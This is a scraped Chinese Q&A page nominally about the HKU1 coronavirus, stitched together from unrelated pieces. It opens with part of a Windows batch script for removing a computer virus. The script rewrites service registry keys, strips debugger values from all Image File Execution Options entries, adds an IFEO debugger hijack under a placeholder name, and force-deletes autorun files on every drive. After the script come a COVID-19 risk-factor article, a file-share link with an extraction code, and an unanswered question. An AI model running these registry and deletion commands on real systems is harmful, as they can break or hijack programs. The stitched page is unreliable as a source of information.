echo "Description"="服務和應用程序在非標准環境下運行時允許錯誤報告。">>tmp.憶林子.reg
echo "DisplayName"="Error Reporting Service">>tmp.憶林子.reg
echo "ErrorControl"=dword:00000000>>tmp.憶林子.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>tmp.憶林子.reg
echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>tmp.憶林子.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>tmp.憶林子.reg
echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>tmp.憶林子.reg
echo "ObjectName"="LocalSystem">>tmp.憶林子.reg
echo "Start"=dword:00000002>>tmp.憶林子.reg
echo "Type"=dword:00000020>>tmp.憶林子.reg
echo.>>tmp.憶林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Parameters]>>tmp.憶林子.reg
echo "ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\>>tmp.憶林子.reg
echo 00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\>>tmp.憶林子.reg
echo 65,00,72,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00>>tmp.憶林子.reg
echo.>>tmp.憶林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Security]>>tmp.憶林子.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>tmp.憶林子.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>tmp.憶林子.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>tmp.憶林子.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>tmp.憶林子.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>tmp.憶林子.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>tmp.憶林子.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>tmp.憶林子.reg
echo.>>tmp.憶林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Enum]>>tmp.憶林子.reg
echo "0"="Root\\LEGACY_ERSVC\\0000">>tmp.憶林子.reg
echo "Count"=dword:00000001>>tmp.憶林子.reg
echo "NextInstance"=dword:00000001>>tmp.憶林子.reg
reg import tmp.憶林子.reg
for %%d in (c:\tmp1.憶林子,c:\tmp2.憶林子,tmp.憶林子,tmp.憶林子.reg) do (
if exist %%d del %%d /q
)
rem 改回被病毒修改的注冊表項
reg add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v DoReport /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v ShowUI /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun /f
for %%d in (c:\tmp1.憶林子,c:\tmp2.憶林子,tmp.憶林子,tmp.憶林子.reg) do (
if exist %%d del %%d /q
)

rem 刪除病毒在注冊表中添加的關聯
if exist test.憶林子 del test.憶林子
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options">test.憶林子
for /f "tokens=* delims= skip=4" %%j in (test.憶林子) do (
reg delete "%%j" /v debugger /f
cls
if exist test.憶林子 del test.憶林子
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 正在清除由病毒添加的注冊表項,請稍候...
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
)
if exist test.憶林子 del test.憶林子
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft^\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path" /v Debugger /d "ntsd -d" /f
cls
for %%f in (auto.exe,autorun.inf) do (
for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%d:\%%f attrib -s -h -r %%d:\%%f
if exist %%d:\%%f del %%d:\%%f /q
)
)
cls
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 病毒清除完畢,按回車鍵開始解決分區無法雙擊打開的問題.
echo 注意:因為刪除了第個分區根目錄下的autorun.inf文件,所以要
echo 對你的分區進行磁碟檢查才能雙擊打開,或者你也可以重啟。
echo 在磁碟檢查時你的一些應用程序像QQ可能會被強制退出。如果不想
echo 現在檢查的話,請關閉該批處理。下次重啟你的分區即可雙擊打開。
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
set /p test=
for /D %%d in (d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%d:\ chkdsk %%d: /f /x
)
cls
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
set /p tmp= 操作結束,按回車鍵退出該程序。
exit

H. 擴增陽性Sars-cov-2是什麼意思∵

目前全球約有400萬人感染嚴重急性呼吸綜合征冠狀病毒2型(SARS-CoV-2),超過26萬人死於2019冠狀病毒病(COVID-19)並發症。這種流行病給患者、醫療保健提供者和決策者帶來了嚴重挑戰。根據患者過去和現在的醫療特點,及時將患者分為風險組,可以更好地應對其中的許多挑戰。為了可靠地識別風險增加(或降低)的患者可以指導臨床決策(例如住院與家庭護理)、公共衛生政策(例如,基於風險的隔離)和准備工作(例如,需要預期的醫療設備)。

有人提出了各種演算法來識別有COVID-19(嚴重)並發症風險的患者。疾病控制和預防中心(CDC)認定,65歲及以上、居住在養老院或長期護理機構、或患有基礎疾病(特別是如果控制不好的話)的個人有可能患上COVID-19的嚴重疾病,一些研究列出了70歲以上和一些潛在的條件作為關鍵疾病的危險因素。另一項研究稱包括實體器官移植接受者、特定癌症或嚴重呼吸系統疾病患者、患有嚴重心臟病的孕婦以及感染風險增加的患者(例如由於免疫抑制治療)是COVID-19風險組。此外,70歲以上的患者和那些患有一些潛在健康狀況的患者(例如慢性呼吸系統疾病,體重指數≥40,孕婦)被認為是一個更廣泛的弱勢群體(也稱為「流感群體」)。

最近的一項研究,以色列的研究團隊分析了以色列所有SARS-CoV-2陽性患者的病歷,比較了復雜人群和非復雜人群的患病率,並確定與COVID-19並發症相關的不同年齡和性別的情況,並分析強調了特定階層的危險因素,可能有助於更好地識別不同人群中的危險患者。

研究團隊的分析所強調的許多情況以前已經報道過,並且是常用的危險定義的一部分,包括高血壓、肥胖、腎臟和心血管疾病。然而,也確定了一些額外的危險因素,尤其是18-50歲的男性抑鬱患者以及65歲或65歲以上認知和神經障礙患者。這些增加可能在一定程度上與65歲以上年齡組的不同年齡分布有關。盡管如此,有了一些初步的支持,它們可能在未來的研究中值得更多的考慮。

綜上所述,可靠地確定COVID-19並發症風險增加的患者可以指導臨床決策、公共衛生政策和准備工作。迄今為止,全球公認的高危患者定義主要依賴於住院COVID-19患者的流行病學特徵。分析表明,心血管和腎臟疾病、肥胖和高血壓是COVID-19並發症的重要危險因素,18-50歲的男性抑鬱患者以及65歲或65歲以上認知和神經障礙患者是顯著的危險因素,吸煙和呼吸系統疾病的病史不會顯著增加並發症的風險。根據這些觀察結果,調整現有的風險定義可能會提高其准確性,並影響全球遏制大流行的努力。

特別聲明:以上內容(如有圖片或視頻亦包括在內)為自媒體平台「網易號」用戶上傳並發布,本平台僅提供信息存儲服務

I. 新型冠狀病毒是一種什麼樣的病毒

安瀟給孩子的冠狀病毒繪本 網路網盤

鏈接: https://pan..com/s/1vidE3x7dekDsmLF07kYf0w 提取碼: 4kc8 復制這段內容後打開網路網盤手機App,操作更方便哦

若資源有問題歡迎追問~


J. HcoV-HKu1幾幾年發現的

幾幾年發現的不知道啊?

閱讀全文

與hku1病毒相關的內容

友情鏈接

本站內容整理源於互聯網,如有問題請聯系解決。
滬ICP備16029729號
Copyright design: www.gtjafl.com since 2016